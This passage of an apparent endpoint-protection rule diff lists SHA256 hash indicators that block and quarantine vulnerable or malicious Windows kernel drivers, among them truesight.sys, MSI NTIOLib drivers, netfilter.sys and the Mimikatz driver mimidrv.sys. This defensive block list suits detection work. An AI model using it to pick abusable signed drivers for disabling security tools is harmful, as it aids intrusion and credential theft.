"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827551Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ece9cb2d25fa5c96818f0cf91d82aba6d6d2f861cc0c44e5ad32cd5b4f57fd3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b78cb50f-875e-50ed-aa71-b9d7d0936006", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972612Z", + "creation_date": "2026-03-23T11:45:29.972614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972619Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4eca7db365929ff7c5c785e2eab04ef8ec67ea9edcf7392f2b74eccd9449148", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b79bd2bd-4b72-5bdb-98f0-3f2f386feb63", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830239Z", + "creation_date": "2026-03-23T11:45:31.830241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecb07e72d6937ab5cee4a7b8176351cbdefa3e0b230a5973b8fc6c2f2c02f30d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7a1d707-6781-57b0-a7e3-cc26171c62e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826578Z", + "creation_date": "2026-03-23T11:45:31.826580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.826585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "090b6145fa96cb218f77f8c03c0c17f0f3d579f234761781ca6d6cb2122959c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7ad808c-fe08-5b42-af00-f1ecdfb49ff9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148740Z", + "creation_date": "2026-03-23T11:45:31.148742Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148747Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "870646a801f2e60c1d7bc2fcc305ad8511c9eabdc10828fcdd36b111e51a6f03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7add52e-ac7c-5569-95dd-8287c619b80a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818709Z", + "creation_date": "2026-03-23T11:45:31.818712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02fd2579e9c55b80c7c86b9f7a9034ec8fd80824e7228840d1f29aa47a739014", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7b46e24-f9df-59d4-9deb-5a6548d2592a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833782Z", + "creation_date": "2026-03-23T11:45:30.833785Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "3d1d818a5f3f44aa2a125059f27419313e91d5e33be5060cc5b0f79e740625a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7cd6835-dfc5-509c-8f7e-00f1adccf277", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608317Z", + "creation_date": "2026-03-23T11:45:29.608319Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608324Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a22d5d42dd0cdae016b536799ab9c384c23b42f5662f0b115b3b85ccb9e23242", + "comment": "Malicious Kernel Driver (aka hlpdrv.sys) [https://news.sophos.com/en-us/2025/12/06/inside-shanya-a-packer-as-a-service-fueling-modern-attacks/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7cdf172-00a3-5086-bb4e-a74eeb58b40a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828919Z", + "creation_date": "2026-03-23T11:45:31.828921Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828926Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c05e168fc2806a4883713813487fc501462ee69e28ecfc76b8044b9d057f204", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7cf1804-f8a1-52bd-915b-ec0b61179d3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500038Z", + "creation_date": "2026-03-23T11:45:31.500041Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2c9f7ececbafd9936ad4d72f6d1cfd333f9cf7c9320e8383a6d18dfd40892ed", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7dd8c09-7318-5d98-b03f-b34d4475d3bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825596Z", + "creation_date": "2026-03-23T11:45:30.825598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd4702f963b6c4fa7884c87e8924f9062e608216a299e5acbaa7421f2287711b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7e9da62-716d-5ce7-b165-a0999f0e2881", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:30.823865Z", + "creation_date": "2026-03-23T11:45:30.823867Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823889Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "347acba74fdcbeac671521739f8a34ec0e378caf716c31f55616f9f843e4d0d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7f1376b-3360-5169-8897-7f17e8eb3f47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500091Z", + "creation_date": "2026-03-23T11:45:31.500094Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3114d18c1b9f7b04688b779d26c24ad199ed06ab41a9704dcdd723c1de370115", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7f2b9f8-be09-5b45-84bf-e2a256108fac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615502Z", + "creation_date": "2026-03-23T11:45:29.615504Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615509Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e951858d5317724c015eef07d402e8bcb33cf1a7c2ccf7a75cea63e3430d16a2", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7f561d9-eb74-5ec2-b211-6867ba400773", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489179Z", + "creation_date": "2026-03-23T11:45:31.489181Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47e5bc2ff855dd341963b37f07d51c701f188a5f8ce09e67dfc6fa11cfb5e01f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b7fd577a-7f46-5699-b917-f93653032cc4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467326Z", + "creation_date": "2026-03-23T11:45:30.467330Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2d3101ef507e6d9ae5475d8fd9b1ca6d2548fe0454c25389d6981f1b33f88f7", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b80d1e6d-32be-53a9-a13b-0f98ae3b18bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967967Z", + "creation_date": "2026-03-23T11:45:29.967969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0988d366572a57b3015d875b60704517d05115580678e8f2e126f771eda28f7b", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b80f62f7-adde-5c34-bfef-112b524175cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497559Z", + "creation_date": "2026-03-23T11:45:31.497562Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "b026fbaa7607d48e26f291e514de72700c84fde7f4f417123525407707a155f7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b81d601b-185b-5e90-9cac-f96693cbc52f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472052Z", + "creation_date": "2026-03-23T11:45:31.472055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06a39013cc3c9485537d7e8bbfab5fecd7046372e38bcf921182994883951198", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8235725-f2c4-5330-9ef6-2c3bdca7e808", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145451Z", + "creation_date": "2026-03-23T11:45:32.145453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebe86f9f6c9c6639f3327f210c2a945bbbf069f505b1b85e3aee8d1cddf702f9", + "comment": "Malicious Kernel Driver (aka driver_206006a1.sys) [https://www.loldrivers.io/drivers/9e0a1bae-6509-41fd-a5bf-dfe6cf388682/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b83eef7a-8f92-53d0-aad1-f7785ff427a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825725Z", + "creation_date": "2026-03-23T11:45:30.825728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da08b5a88175b58d0f7fcefeb0eef3efe8ae12e6c04c6f60e88cc4e860e2c277", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8577b45-ccd7-59f8-817e-29c753804b74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152418Z", + "creation_date": "2026-03-23T11:45:31.152421Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae97c26f8724639a6b4e7644625a82c6b548d048b0a89c8f8bb6c62f7d7fe84b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b85bc58f-034a-5ecc-96af-c16494b0ee29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:31.824845Z", + "creation_date": "2026-03-23T11:45:31.824849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824859Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "579ba5f388f4339330735b738f56641c074d5ebeafcce468a578b4cc1517b38b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b8774bcf-44e2-57fc-9191-e7381e474f73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614902Z", + "creation_date": "2026-03-23T11:45:29.614906Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614912Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b88098fd-f140-5aca-aade-096954713ea8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456132Z", + "creation_date": "2026-03-23T11:45:30.456135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "274340f7185a0cc047d82ecfb2cce5bd18764ee558b5227894565c2f9fe9f6ab", + "comment": "Vulnerable Kernel Driver (aka fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys) 